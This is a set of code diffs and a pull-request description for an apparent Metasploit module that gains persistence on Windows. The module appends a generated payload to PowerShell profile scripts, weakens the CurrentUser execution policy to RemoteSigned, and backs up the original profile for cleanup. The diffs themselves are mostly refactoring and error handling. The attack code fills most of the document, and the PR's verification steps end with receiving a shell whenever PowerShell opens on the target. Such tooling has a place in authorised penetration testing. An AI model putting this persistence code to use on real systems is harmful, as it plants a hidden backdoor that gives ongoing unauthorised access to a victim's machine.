           cmd_exec("cmd /c \"md #{folders}\"")
           @clean_up_rc << "rmdir #{folders.gsub('\\', '/')}\n"
         end
-        write_file(profile_file, '') # write empty file so we can append later
+        unless write_file(profile_file, '') # write empty file so we can append later
+          print_error("Failed to create profile file at #{profile_file}")
+          return false
+        end
         module_created_file = true
       else
         print_error("#{profile_file} does not exist and CREATE option is false")
@@ -123,23 +126,26 @@ class MetasploitModule < Msf::Exploit::Local
     pload = pload.join(splitter)[1..-2] # rejoin, then remove surrounding double quotes
 
     vprint_status("Appending payload to #{profile_file}")
-    fail_with(Failure::NoAccess, "Unable to append payload to #{profile_file}") unless append_file(profile_file, "\n#{pload}\n")
+    unless append_file(profile_file, "\n#{pload}\n")
+      print_error("Failed to append payload to #{profile_file}")
+      return false
+    end
     true
   end
 
   def install_persistence
-    policy = cmd_exec('powershell -NoProfile -Command "$PROFILE | Select-Object * | ConvertTo-Json"')
+    profiles = cmd_exec('powershell -NoProfile -Command "$PROFILE | Select-Object * | ConvertTo-Json"')
     begin
-      profiles = JSON.parse(policy)
+      profiles = JSON.parse(profiles)
     rescue JSON::ParserError
-      fail_with(Failure::UnexpectedReply, "Failed to parse powershell profile paths: #{policy}")
+      fail_with(Failure::UnexpectedReply, "Failed to parse powershell profile paths: #{profiles}")
     end
     profiles = profiles.transform_keys { |k| k.to_s.upcase }
 
     if !policy_allows_execution? && datastore['EXECUTIONPOLICY']
       print_status('Updating Powershell execution policy for CurrentUser to RemoteSigned')
       cmd_exec('powershell -NoProfile -Command "Set-ExecutionPolicy -Scope CurrentUser RemoteSigned"')
-      @clean_up_rc << "execute -f powershell -a \"-NoProfile -Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
+      @clean_up_rc << "execute -f powershell -a \"-NoProfile -w hidden -Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
     end
 
     case datastore['PROFILE']

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local
     execution_policies = cmd_exec('powershell -NoProfile -Command "$h = @{}; Get-ExecutionPolicy -List | ForEach-Object { $h[$_.Scope.ToString()] = $_.ExecutionPolicy.ToString() }; $h | ConvertTo-Json"')
     begin
       @policies = JSON.parse(execution_policies)
-    rescue JSON::ParserError => e
+    rescue JSON::ParserError
       print_error("Failed to parse powershell execution policies: #{execution_policies}")
       return false
     end
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_status("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']})")
 
-    CheckCode::Appears('Powershell is installed on the target system')
+    CheckCode::Appears('Powershell is installed and exploitable on the target system')
   end
 
   def backdoor_profile(profile_file)
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
           cmd_exec("cmd /c \"md #{folders}\"")
           @clean_up_rc << "rmdir #{folders.gsub('\\', '/')}\n"
         end
-        write_file(profile_file, '')
+        write_file(profile_file, '') # write empty file so we can append later
         module_created_file = true
       else
         print_error("#{profile_file} does not exist and CREATE option is false")
@@ -117,22 +117,13 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    download_and_run = encode_script(payload.encoded)
-    pload = generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: download_and_run)
-    # pload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
-    # now we want to change this to run threaded
-    # pload = "Start-Process powershell.exe -ArgumentList '-nop', '-w hidden', '-c', #{pload.split('-c')[1..].join('-c').strip.gsub('$', '\\$')}"
-    # pload = pload.split('-c')
-    # pload = pload[1..]
-    # pload = pload.join('-c').strip
-    # pload = pload[1..-2] # remove double quotes
-    # puts pload.split('-c')[1..].join('-c').strip
-    # pload = Rex::Text.encode_base64(pload)
-    # puts pload
-    # pload = "Start-Process powershell.exe -ArgumentList '-nop', '-w hidden', '-encodedcommand #{pload}'"
-    # puts pload
+    pload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
+    splitter = '-c '
+    pload = pload.split(splitter)[1..] # remove all the powershell.exe and setup/run stuff, we only need the code bit here
+    pload = pload.join(splitter)[1..-2] # rejoin, then remove surrounding double quotes
 
-    append_file(profile_file, "\n#{pload}\n")
+    vprint_status("Appending payload to #{profile_file}")
+    fail_with(Failure::NoAccess, "Unable to append payload to #{profile_file}") unless append_file(profile_file, "\n#{pload}\n")
     true
   end
 
@@ -140,15 +131,14 @@ class MetasploitModule < Msf::Exploit::Local
     policy = cmd_exec('powershell -NoProfile -Command "$PROFILE | Select-Object * | ConvertTo-Json"')
     begin
       profiles = JSON.parse(policy)
-    rescue JSON::ParserError => e
-      print_error("Failed to parse powershell profile paths: #{policy}")
-      return
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, "Failed to parse powershell profile paths: #{policy}")
     end
     profiles = profiles.transform_keys { |k| k.to_s.upcase }
 
     if !policy_allows_execution? && datastore['EXECUTIONPOLICY']
       print_status('Updating Powershell execution policy for CurrentUser to RemoteSigned')
-      puts cmd_exec('powershell -NoProfile -Command "Set-ExecutionPolicy -Scope CurrentUser RemoteSigned"')
+      cmd_exec('powershell -NoProfile -Command "Set-ExecutionPolicy -Scope CurrentUser RemoteSigned"')
       @clean_up_rc << "execute -f powershell -a \"-Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
     end
 
@@ -159,13 +149,12 @@ class MetasploitModule < Msf::Exploit::Local
           print_error("#{profile} not found in user's profiles")
           next
         end
-        success = backdoor_profile(profiles[datastore['PROFILE']])
+        success = backdoor_profile(profiles[profile])
         break if success
       end
     when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'
       unless profiles.key?(datastore['PROFILE'])
-        print_error("#{datastore['PROFILE']} not found in user's profiles")
-        return
+        fail_with(Failure::UnexpectedReply, "#{datastore['PROFILE']} not found in user's profiles")
       end
       backdoor_profile(profiles[datastore['PROFILE']])
     end

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -4,18 +4,12 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+  Rank = ExcellentRanking
 
-  # includes writable?, upload_file, upload_and_chmodx, exploit_data
   include Msf::Post::File
-  # includes pwsh
-  inlude Msft::Exploit::Powershell
-  # includes generate_payload_exe
-  include Msf::Exploit::EXE
-  # defines install_persistence and does our cleanup
-  # WritableDir
+  include Msf::Exploit::Powershell
+  include Msf::Post::Windows::Registry
   include Msf::Exploit::Local::Persistence
-  # runs check automatically
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -49,60 +43,70 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-    # options
     register_options [
       OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']])
     ]
-    # force exploit is used to bypass the check command results
     register_advanced_options [
-      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptBool.new('CREATE', [true, 'If a profile file doesnt exist, create one.', false])
     ]
   end
 
   def check
-    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
-    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
     return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft').include?('PowerShell')
 
-    CheckCode::Detected('example app is installed')
+    CheckCode::Detected('Powershell is installed on the target system')
   end
 
-  #
-  # The install_persistence method installs the persistence, starts the handler, and does all
-  # the main activities
-  #
   def backdoor_profile(profile_file)
-    unless readable?(profile_file)
-      print_error("#{profile_file} can not be read")
-      return
+    module_created_file = false
+    unless file?(profile_file)
+      if datastore['CREATE']
+        print_status("#{profile_file} does not exist, creating it...")
+        write_file(profile_file, '')
+        module_created_file = true
+      else
+        print_error("#{profile_file} does not exist and CREATE option is false")
+        return false
+      end
     end
 
-    pfile = read_file(profile_file)
-    backup_file = store_loot(
-      'powershell.profile',
-      'text/plain',
-      session,
-      pfile, profile_file.split('\\').last,
-      'powershell profile backup'
-    )
+    if module_created_file
+      @clean_up_rc << "rm #{profile_file}\n"
+    else
+      unless readable?(profile_file)
+        print_error("#{profile_file} can not be read")
+        return false
+      end
 
-    print_status("Created #{profile_file} backup: #{backup_file}")
+      pfile = read_file(profile_file)
+      backup_file = store_loot(
+        'powershell.profile',
+        'text/plain',
+        session,
+        pfile, profile_file.split('\\').last,
+        'powershell profile backup'
+      )
+
+      print_status("Created #{profile_file} backup: #{backup_file}")
+      @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
+    end
+
     append_file(profile_file, "\n#{payload.encoded}")
-    @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
+    true
   end
 
   def install_persistence
-    profiles = JSON.parse(cmd_exec('$PROFILE | Select-Object * | ConvertTo-Json;'))
-    profiles.transform_keys { |k| k.upcase }
+    profiles = JSON.parse(cmd_exec('powershell -Command "$PROFILE | Select-Object * | ConvertTo-Json"'))
+    profiles.transform_keys(&:upcase)
     case datastore['PROFILE']
     when 'AUTO'
-      ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |_profile|
-        unless profiles.key?(datastore['PROFILE'])
-          print_error("#{datastore['PROFILE']} not found in user's profiles")
-          return
+      ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|
+        unless profiles.key?(profile)
+          print_error("#{profile} not found in user's profiles")
+          next
         end
         success = backdoor_profile(profiles[datastore['PROFILE']])
-        return if success
+        break if success
       end
     when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'
       unless profiles.key?(datastore['PROFILE'])
@@ -112,3 +116,4 @@ class MetasploitModule < Msf::Exploit::Local
       backdoor_profile(profiles[datastore['PROFILE']])
     end
   end
+end

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local
     if !policy_allows_execution? && datastore['EXECUTIONPOLICY']
       print_status('Updating Powershell execution policy for CurrentUser to RemoteSigned')
       cmd_exec('powershell -NoProfile -Command "Set-ExecutionPolicy -Scope CurrentUser RemoteSigned"')
-      @clean_up_rc << "execute -f powershell -a \"-Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
+      @clean_up_rc << "execute -f powershell -a \"-NoProfile -Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
     end
 
     case datastore['PROFILE']


### PR DESCRIPTION

This module establishes persistence by modifying a PowerShell profile script, which is automatically
executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) 
and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.

## Verification

1. Start msfconsole
2. Get a shell on Windows
3. Do: use exploit/windows/persistence/powershell_profile
4. Do: set payload [payload]
5. Do: set session #
6. Do: run

You should get a shell when powershell is opened on the target machine.
